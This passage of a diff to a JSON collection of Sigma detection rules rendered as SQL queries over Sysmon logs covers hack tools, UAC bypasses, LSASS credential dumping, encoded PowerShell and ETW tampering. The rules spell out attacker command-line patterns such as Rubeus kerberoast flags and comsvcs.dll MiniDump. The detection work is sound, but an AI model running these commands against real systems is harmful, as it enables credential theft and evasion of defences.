WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "UAC Bypass Tools Using ComputerDefaults", - "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", @@ -8278,894 +8036,904 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "HackTool - Rubeus Execution", - "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "status": "stable", - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "status": "experimental", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Very unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '% asreproast %' ESCAPE '\\' OR CommandLine LIKE '% dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '% dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '% kerberoast %' ESCAPE '\\' OR CommandLine LIKE '% createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '% ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% /impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '% renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '% harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '% s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% hash /password:%' ESCAPE '\\' OR CommandLine LIKE '% golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '% silver /user:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_rubeus.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Potential Russian APT Credential Theft Activity", - "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", - "status": "stable", - "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Findstr LSASS", - "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_findstr_lsass.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", - "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "status": "test", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE 